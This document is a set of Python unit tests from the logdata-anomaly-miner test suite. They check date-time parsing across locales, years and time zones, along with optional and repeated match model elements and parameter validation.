self.assertRaises(locale.Error, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, "af-ZA.UTF-8")]) def test7get_match_element_with_start_year(self): """Test if dates without year can be parsed, when the start_year is defined.""" data = b"07.02 11:40:00: it still works" date = b"07.02 11:40:00" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=2017) match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1486467600, None) multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=2019) match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1549539600, None) def test8get_match_element_without_start_year_defined(self): """Test if dates without year can still be parsed, even without defining the start_year.""" data = b"07.02 11:40:00: it still works" date = b"07.02 11:40:00" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)]) match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) dtm = datetime(datetime.now().year, 2, 7, 11, 40, tzinfo=timezone.utc) total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, total_seconds, None) def test9get_match_element_with_leap_start_year(self): """Check if leap start_years can parse the 29th February.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=2020) data = b"29.02 11:40:00: it 
still works" date = b"29.02 11:40:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1582976400, None) def test10get_match_element_without_leap_start_year(self): """Check if normal start_years can not parse the 29th February.""" data = b"29.02 11:40:00: it still works" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=2019) match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test11learn_new_start_year_with_start_year_set(self): """Test if a new year is learned successfully with the start year being set.""" start_year = 2020 multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=start_year) data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1609459140, None) self.assertEqual(multi_locale_dtme.start_year, start_year) data = b"01.01 11:20:00: it still works" date = b"01.01 11:20:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1609500000, None) self.assertEqual(multi_locale_dtme.start_year, start_year + 1) def test12learn_new_start_year_without_start_year_set(self): """Test if a new year is learned successfully with the start year being None.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)]) data = 
b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) dtm = datetime(datetime.now().year, 12, 31, 23, 59, tzinfo=timezone.utc) total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, total_seconds, None) start_year = multi_locale_dtme.start_year data = b"01.01 11:20:00: it still works" date = b"01.01 11:20:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) dtm = datetime(datetime.now().year+1, 1, 1, 11, 20, tzinfo=timezone.utc) total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, total_seconds, None) self.assertEqual(multi_locale_dtme.start_year, start_year + 1) def test13max_time_jump_seconds_in_time(self): """ Test if the max_time_jump_seconds parameter works if the next date is in time. Warnings with unqualified timestamp year wraparound. 
""" log_stream = StringIO() logging.basicConfig(stream=log_stream, level=logging.INFO) max_time_jump_seconds = 86400 start_year = 2020 multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=start_year, max_time_jump_seconds=max_time_jump_seconds) data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1609459140, None) self.assertEqual(multi_locale_dtme.start_year, 2020) data = b"01.01 23:59:00: it still works" date = b"01.01 23:59:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1609545540, None) self.assertEqual(multi_locale_dtme.start_year, 2021) self.assertIn("WARNING:DEBUG:DateTimeModelElement unqualified timestamp year wraparound detected from 2021-01-01T23:59:00+00:00 to " "2021-01-01T23:59:00+00:00", log_stream.getvalue()) for handler in logging.root.handlers[:]: logging.root.removeHandler(handler) initialize_loggers(self.aminer_config, getpwnam("aminer").pw_uid, getgrnam("aminer").gr_gid) def test14max_time_jump_seconds_exceeded(self): """ Test if the start_year is not updated, when the next date exceeds the max_time_jump_seconds. A time inconsistency warning must occur. 
""" log_stream = StringIO() logging.basicConfig(stream=log_stream, level=logging.INFO) max_time_jump_seconds = 86400 start_year = 2020 multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=start_year, max_time_jump_seconds=max_time_jump_seconds) data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1609459140, None) self.assertEqual(multi_locale_dtme.start_year, start_year) data = b"01.01 23:59:01: it still works" date = b"01.01 23:59:01" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1577923141, None) self.assertEqual(multi_locale_dtme.start_year, start_year) self.assertIn("WARNING:DEBUG:DateTimeModelElement time inconsistencies parsing b'01.01 23:59:01', expecting value around " "1609459140. 
Check your settings!", log_stream.getvalue()) for handler in logging.root.handlers[:]: logging.root.removeHandler(handler) initialize_loggers(self.aminer_config, getpwnam("aminer").pw_uid, getgrnam("aminer").gr_gid) def test15time_change_cest_cet(self): """Check if the time change from CET to CEST and vice versa work as expected.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S%z", None, None)]) data = b"24.03.2018 11:40:00 CET: it still works" date = b"24.03.2018 11:40:00 CET" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1521888000, None) data = b"25.03.2018 11:40:00 CEST: it still works" date = b"25.03.2018 11:40:00 CEST" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1521970800, None) data = b"27.10.2018 11:40:00 CEST: it still works" date = b"27.10.2018 11:40:00 CEST" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1540633200, None) data = b"28.10.2018 11:40:00 CET: it still works" date = b"28.10.2018 11:40:00 CET" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1540723200, None) data = b"27.10.2018 11:40:00 EST: it still works" date = b"27.10.2018 11:40:00 EST" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, 
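# Tail of test15: closes the compare_match_results(...) call that is opened before this block.
            self.id_ + "/format0", self.path, date, 1540658400, None)
        data = b"27.10.2018 11:40:00 PDT: it still works"
        date = b"27.10.2018 11:40:00 PDT"
        match_context = DummyMatchContext(data)
        match_element = multi_locale_dtme.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1540665600, None)
        data = b"27.10.2018 11:40:00 GMT: it still works"
        date = b"27.10.2018 11:40:00 GMT"
        match_context = DummyMatchContext(data)
        match_element = multi_locale_dtme.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1540640400, None)

    def test16same_timestamp_multiple_times(self):
        """
        Test if the MultiLocaleDateTimeModelElement can handle multiple same timestamps.

        The same line is parsed twice with a fresh DummyMatchContext each time; both passes must produce the
        identical match (path suffix "/format0", epoch 1549539600).
        """
        multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", None, None)])
        data = b"07.02.2019 11:40:00: it still works"
        date = b"07.02.2019 11:40:00"
        for _ in range(2):
            match_context = DummyMatchContext(data)
            match_element = multi_locale_dtme.get_match_element(self.path, match_context)
            self.compare_match_results(
                data, match_element, match_context, self.id_ + "/format0", self.path, date, 1549539600, None)

    def test17date_before_unix_timestamps(self):
        """Check if timestamps before the unix timestamp are processed properly, i.e. yield a negative epoch value."""
        multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", None, None)])
        data = b"01.01.1900 11:40:00: it still works"
        date = b"01.01.1900 11:40:00"
        match_context = DummyMatchContext(data)
        match_element = multi_locale_dtme.get_match_element(self.path, match_context)
        # 01.01.1900 lies before the epoch, so the expected timestamp is negative.
        self.compare_match_results(
            data, match_element, match_context, self.id_ + "/format0", self.path, date, -2208946800, None)

    def test18element_id_input_validation(self):
        """Check if element_id is validated: an empty string raises ValueError, every non-str type raises TypeError."""
        date_formats = [(b"%d.%m.%Y %H:%M:%S", None, None)]
        self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, "", date_formats)  # empty element_id
        # bool is rejected too, although it is an int subclass.
        for invalid_id in (None, b"path", 123, 123.22, True, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, invalid_id, date_formats)

    def test19date_formats_input_validation(self):
        """
        Check if date_format is validated and only valid values can be entered.

        Covers the accepted specifier set, specifiers that may not be combined, unknown specifiers, repeated
        specifiers, the type of the format itself and the arity of each (format, time_zone, text_locale) tuple.
        """
        allowed_format_specifiers = b"bdfHMmSsYz%"
        # check if allowed values do not raise any exception.
        format_specifiers = b""
        for c in allowed_format_specifiers:
            specifier = b"%" + bytes([c])
            format_specifiers += specifier
            MultiLocaleDateTimeModelElement(self.id_, [(specifier, None, None)])
        # check if all allowed values can not be used together.
        # An exception should be raised, because of multiple month representations (%b and %m)
        # and %s with non-second formats.
        self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(format_specifiers, None, None)])
        MultiLocaleDateTimeModelElement(self.id_, [(format_specifiers.replace(b"%m", b"").replace(b"%s", b""), None, None)])
        MultiLocaleDateTimeModelElement(self.id_, [(format_specifiers.replace(b"%b", b"").replace(b"%s", b""), None, None)])
        # %s may only be combined with %z and %f; every other specifier next to %s is rejected.
        MultiLocaleDateTimeModelElement(self.id_, [(b"%s%z%f", None, None)])
        for c in allowed_format_specifiers.replace(b"s", b"").replace(b"z", b"").replace(b"f", b"").replace(b"%", b""):
            self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%s%" + bytes([c]), None, None)])
        # test non-existent specifiers
        for c in b"aceghijklnopqrtuvwxyABCDEFGIJKLNOPQRTUVWXZ":
            self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%" + bytes([c]), None, None)])
        # test multiple specifiers. % and z specifiers are allowed multiple times.
        MultiLocaleDateTimeModelElement(self.id_, [(b"%%%z%z", None, None)])
        for c in allowed_format_specifiers.replace(b"%", b"").replace(b"z", b""):
            doubled = b"%" + bytes([c]) + b"%" + bytes([c])
            self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(doubled, None, None)])
        self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%s%z%f", None)])
        self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"", None, None)])  # empty
        # wrong type for the format itself (only bytes is accepted)
        for invalid_format in (None, "", 123, 123.22, True, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(invalid_format, None, None)])
        self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [[b"%d.%m.%Y %H:%M:%S", None, None]])  # list instead of tuple
        self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [()])  # empty tuple
        # NOTE: tuple(b"...") is a 19-tuple of ints, not a 1-tuple; the single-element case
        # (b"%d.%m.%Y %H:%M:%S",) is therefore not covered by this assertion.
        self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [tuple(b"%d.%m.%Y %H:%M:%S")])  # 19 ints, wrong arity
        self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None)])  # 2 tuple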
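# Last statement of test19date_formats_input_validation (the method header precedes this block).
        self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, None, None)])  # 4 tuple

    def test20time_zone_input_validation(self):
        """
        Check if time_zone is validated and only valid values can be entered.

        None defaults to UTC for every sub-element; datetime.timezone and pytz zones are accepted; strings,
        bytes, numbers, bools and containers raise TypeError.
        """
        en_gb_utf8 = "en_GB.utf8"
        en_us_utf8 = "en_US.utf8"
        de_at_utf8 = "de_AT.utf8"
        multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [
            (b"%d.%m.%Y %H:%M:%S.%f", None, None), (b"%d.%m.%Y %H:%M:%S%z", None, None), (b"%d.%m.%Y %H:%M:%S", None, None),
            (b"%d.%m.%YT%H:%M:%S", None, None), (b"%d.%m.%Y", None, None), (b"%H:%M:%S:%f", None, de_at_utf8), (b"%H:%M:%S", None, None),
            (b"%d %b %Y", None, en_gb_utf8), (b"%dth %b %Y", None, en_gb_utf8), (b"%d/%m/%Y", None, en_gb_utf8), (b"%m-%d-%Y", None, en_us_utf8),
            (b"%d.%m. %H:%M:%S:%f", None, de_at_utf8)])
        # time_zone=None must resolve to UTC for each configured format.
        for dtme in multi_locale_dtme.date_time_model_elements:
            self.assertEqual(dtme.time_zone, timezone.utc)
        MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)])
        for tz in pytz.all_timezones:
            MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", pytz.timezone(tz), None)])
        # a zone name as str/bytes is not accepted, it has to be a tzinfo object
        for invalid_tz in (b"", "UTC", 1, 1.25, True, [timezone.utc], {"time_zone": timezone.utc}):
            self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", invalid_tz, None)])

    def test21text_locale_input_validation(self):
        """
        Check if text_locale is validated and only valid values can be entered.

        An exception has to be raised if the locale is not installed on the system.
        Accepted forms are a "lang_COUNTRY.encoding" string or a (language, encoding) 2-tuple.
        """
        MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, "en_US.UTF-8")])
        MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, ("en_US", "UTF-8"))])
        # right type, wrong value: empty string, tuple of single characters, 3-tuple
        for invalid_locale in ("", tuple("en_US.UTF-8"), ("en_US", "UTF-8", "t")):
            self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, invalid_locale)])
        for invalid_locale in (b"", 1, 1.2, True, ["en_US", "UTF-8"], {"en_US": "UTF-8"}):
            self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, invalid_locale)])

    def test22start_year_input_validation(self):
        """Check if start_year is validated: None defaults to the current year, any int (also negative) is accepted."""
        multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, None)], None)
        self.assertEqual(multi_locale_dtme.start_year, datetime.now().year)
        for valid_year in (2020, -630):
            MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, None)], valid_year)
        for invalid_year in ("2020", True, 1.25, [2020], {"key": 2020}):
            self.assertRaises(
                TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], invalid_year)

    def test23max_time_jump_seconds_input_validation(self):
        """Check if max_time_jump_seconds is validated: None defaults to 86400, positive ints pass, 0 and negatives raise ValueError."""
        multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, None)], None)
        self.assertEqual(multi_locale_dtme.max_time_jump_seconds, 86400)
        for valid_jump in (100000, 1):
            MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], None, valid_jump)
        for invalid_jump in (-1, 0):
            self.assertRaises(
                ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], None, invalid_jump)
        for invalid_jump in ("1000", True, 1.25, {"key": 2020}, [1000]):
            self.assertRaises(
                TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], None, invalid_jump)

    def test24get_match_element_match_context_input_validation(self):
        """Check if an exception is raised, when other classes than MatchContext are used in get_match_element."""
        model_element = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", None, None)])
        data = b"07.02.2019 11:40:00: it still works"
        model_element.get_match_element(self.path, DummyMatchContext(data))
        model_element.get_match_element(self.path, MatchContext(data))
        # anything without the MatchContext interface fails with AttributeError
        for not_a_context in (MatchElement(self.path, data, None, None), data, data.decode(), 123, 123.22, True, None, [],
                              {"key": MatchContext(data)}, set(), (), model_element):
            self.assertRaises(AttributeError, model_element.get_match_element, self.path, not_a_context)


if __name__ == "__main__":
    unittest.main()


# logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/OptionalMatchModelElementTest.py000066400000000000000000000133221500476301700316730ustar00rootroot00000000000000
import unittest
from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement


class OptionalMatchModelElementTest(TestBase):
    """Unittests for the OptionalMatchModelElement."""

    id_ = "optional"
    path = "path"
    fixed_id = "fixed"
    fixed_data = b"fixed data"

    def test1get_match_element_valid_match(self):
        """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters."""
        data = b"fixed data string."
        value = self.fixed_data
        match_context = DummyMatchContext(data)
        fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data)
        optional_match = OptionalMatchModelElement(self.id_, fixed_dme)
        match_element = optional_match.get_match_element(self.path, match_context)
        # the wrapped element is matched under "<path>/<id_>" and reported as the single child
        expected_children = [fixed_dme.get_match_element("%s/%s" % (self.path, self.id_), DummyMatchContext(data))]
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, expected_children)

    def test2get_match_element_no_match(self):
        """
        Parse not matching substring from MatchContext and check if the MatchContext was not changed.

        For both an empty input and a non-matching input the expected match string is empty and the expected
        match object and children are None.
        """
        optional_match = OptionalMatchModelElement(self.id_, DummyFixedDataModelElement(self.fixed_id, self.fixed_data))
        for data in (b"", b"other fixed string"):
            match_context = DummyMatchContext(data)
            match_element = optional_match.get_match_element(self.path, match_context)
            self.compare_match_results(data, match_element, match_context, self.id_, self.path, b"", None, None)

    def test3element_id_input_validation(self):
        """Check if element_id is validated: empty string raises ValueError, non-str types raise TypeError."""
        fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data)
        self.assertRaises(ValueError, OptionalMatchModelElement, "", fixed_dme)
        for invalid_id in (None, b"path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, OptionalMatchModelElement, invalid_id, fixed_dme)

    def test4optional_element_input_validation(self):
        """Check if optional_element is validated: only a model element is accepted, everything else raises TypeError."""
        for invalid_element in ("fdme1", None, b"path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, invalid_element)

    def test5get_match_element_match_context_input_validation(self):
        """Check if an exception is raised, when other classes than MatchContext are used in get_match_element."""
        model_element = OptionalMatchModelElement(self.id_, DummyFixedDataModelElement(self.fixed_id, self.fixed_data))
        data = b"fixed data"
        model_element.get_match_element(self.path, DummyMatchContext(data))
        model_element.get_match_element(self.path, MatchContext(data))
        for not_a_context in (MatchElement(None, data, None, None), data, data.decode(), 123, 123.22, True, None, [],
                              {"key": MatchContext(data)}, set(), (), model_element):
            self.assertRaises(AttributeError, model_element.get_match_element, self.path, not_a_context)


if __name__ == "__main__":
    unittest.main()


# logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/ParserMatchTest.py000066400000000000000000000044141500476301700270510ustar00rootroot00000000000000
import unittest
from aminer.parsing.ParserMatch import ParserMatch
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase


class ParserMatchTest(TestBase):
    """Unittests for the ParserMatch."""

    match_element = MatchElement("path", b"match_string", b"match_object", None)

    def test1get_match_element(self):
        """Test if get_match_element returns the very MatchElement the ParserMatch was built from."""
        match = ParserMatch(self.match_element)
        self.assertEqual(match.get_match_element(), self.match_element)

    def test2get_match_dictionary(self):
        """
        Test if MatchElements with and without children are evaluated properly.

        Two three-level chains (a1->a2->a3, b1->b2->b3) hang below a root element; the dictionary returned by
        get_match_dictionary must map every path to its MatchElement.
        """
        a3 = MatchElement("a3", b"a3", b"a3", None)
        a2 = MatchElement("a2", b"a2", b"a2", [a3])
        a1 = MatchElement("a1", b"a1", b"a1", [a2])
        b3 = MatchElement("b3", b"b3", b"b3", None)
        b2 = MatchElement("b2", b"b2", b"b2", [b3])
        b1 = MatchElement("b1", b"b1", b"b1", [b2])
        root_element = MatchElement("root", b"root", b"root", [a1, b1])
        parser_match = ParserMatch(root_element)
        # NOTE(review): the original docstring also promised a check of repeated calls; only one call is made here.
        dictionary = parser_match.get_match_dictionary()
        for path, element in (("root", root_element), ("a1", a1), ("a2", a2), ("a3", a3), ("b1", b1), ("b2", b2), ("b3", b3)):
            self.assertEqual(dictionary[path], element)

    def test3match_element_input_validation(self):
        """Check if match_element is validated: anything that is not a MatchElement raises TypeError."""
        for invalid_element in ("string", None, b"path", 123, 123.22, True, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, ParserMatch, invalid_element)


if __name__ == "__main__":
    unittest.main()


# logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/RepeatedElementDataModelElementTest.py000066400000000000000000000353061500476301700327740ustar00rootroot00000000000000
import unittest
from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement


class RepeatedElementDataModelElementTest(TestBase):
    """Unittests for the RepeatedElementDataModelElement."""

    id_ = "repeated"
    path = "path"
    fixed_id = "fixed"
    fixed_data = b"fixed data "

    def test1get_match_element_valid_match(self):
        """
        Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.

        Children are expected under "<path>/<id_>/<index>", one per repetition, in order.
        """
        fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data)
        repeated_dme = RepeatedElementDataModelElement(self.id_, DummyFixedDataModelElement(self.fixed_id, self.fixed_data))
        # a single repetition followed by unrelated text
        data = b"fixed data string."
        value = b"fixed data "
        match_context = DummyMatchContext(data)
        match_element = repeated_dme.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, [
            fixed_dme.get_match_element("%s/%s/0" % (self.path, self.id_), DummyMatchContext(data))])
        # four repetitions consume the whole input
        data = b"fixed data fixed data fixed data fixed data "
        match_context = DummyMatchContext(data)
        match_element = repeated_dme.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, [
            fixed_dme.get_match_element("%s/%s/%d" % (self.path, self.id_, i), DummyMatchContext(data)) for i in range(4)])
        # repetition stops at the first non-matching position; the remainder of the line stays unconsumed
        data = b"fixed data fixed data \nhere is some other string.\nfixed data fixed data "
        value = b"fixed data fixed data "
        match_context = DummyMatchContext(data)
        match_element = repeated_dme.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, [
            fixed_dme.get_match_element("%s/%s/%d" % (self.path, self.id_, i), DummyMatchContext(data)) for i in range(2)])

    def test2get_match_element_min_max_repeats(self):
        """
        This test case verifies the functionality of setting the minimal and maximal repeats.

        repeated_dme accepts 2..5 repetitions, same_min_max_repeat_dme exactly 3; inputs with 0 up to 6
        repetitions are fed to both elements.
        """
        fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data)
        repeated_dme = RepeatedElementDataModelElement(self.id_, fixed_dme, min_repeat=2, max_repeat=5)
        same_min_max_repeat_dme = RepeatedElementDataModelElement(self.id_, fixed_dme, min_repeat=3, max_repeat=3)
        # 0 repetitions: below both minima
        data = b"other data"
        match_context = DummyMatchContext(data)
        match_element = repeated_dme.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)
        match_context = DummyMatchContext(data)
        match_element = same_min_max_repeat_dme.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)
        # 1 repetition: still below both minima
        data = b"fixed data "
        match_context = DummyMatchContext(data)
        match_element = repeated_dme.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)
        match_context = DummyMatchContext(data)
        match_element = same_min_max_repeat_dme.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)
        # 2 repetitions: enough for repeated_dme, too few for same_min_max_repeat_dme
        data = b"fixed data fixed data "
        match_context = DummyMatchContext(data)
        match_element = repeated_dme.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, [
            fixed_dme.get_match_element("%s/%s/%d" % (self.path, self.id_, i), DummyMatchContext(data)) for i in range(2)])
        match_context = DummyMatchContext(data)
        match_element = same_min_max_repeat_dme.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)
        # 3 repetitions: accepted by both (the same_min_max_repeat_dme check follows)
        data = b"fixed data fixed data fixed data "
        match_context = DummyMatchContext(data)
        match_element = repeated_dme.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, [
            fixed_dme.get_match_element("%s/%s/%d" % (self.path, self.id_, i), DummyMatchContext(data)) for i in range(3)])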
# test2get_match_element_min_max_repeats, continued: three repetitions must also satisfy min=max=3.
        match_context = DummyMatchContext(data)
        match_element = same_min_max_repeat_dme.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, [
            fixed_dme.get_match_element("%s/%s/0" % (self.path, self.id_), DummyMatchContext(data)),
            fixed_dme.get_match_element("%s/%s/1" % (self.path, self.id_), DummyMatchContext(data)),
            fixed_dme.get_match_element("%s/%s/2" % (self.path, self.id_), DummyMatchContext(data))])
        # four and five repetitions: inside repeated_dme's 2..5 window, outside the exact-3 window
        for repetitions in (4, 5):
            data = self.fixed_data * repetitions
            match_context = DummyMatchContext(data)
            match_element = repeated_dme.get_match_element(self.path, match_context)
            expected_children = [fixed_dme.get_match_element("%s/%s/%d" % (self.path, self.id_, index), DummyMatchContext(data))
                                 for index in range(repetitions)]
            self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, expected_children)
            match_context = DummyMatchContext(data)
            match_element = same_min_max_repeat_dme.get_match_element(self.path, match_context)
            self.compare_no_match_results(data, match_element, match_context)
        # six repetitions exceed both maxima
        data = self.fixed_data * 6
        for model_element in (repeated_dme, same_min_max_repeat_dme):
            match_context = DummyMatchContext(data)
            match_element = model_element.get_match_element(self.path, match_context)
            self.compare_no_match_results(data, match_element, match_context)

    def test3element_id_input_validation(self):
        """Check if element_id is validated: empty string raises ValueError, non-str types raise TypeError."""
        fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data)
        self.assertRaises(ValueError, RepeatedElementDataModelElement, "", fixed_dme)
        for bad_id in (None, b"path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, RepeatedElementDataModelElement, bad_id, fixed_dme)

    def test4repeated_element_input_validation(self):
        """Check if repeated_element is validated: anything that is not a model element raises TypeError."""
        for bad_element in ("string", None, b"path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, bad_element)

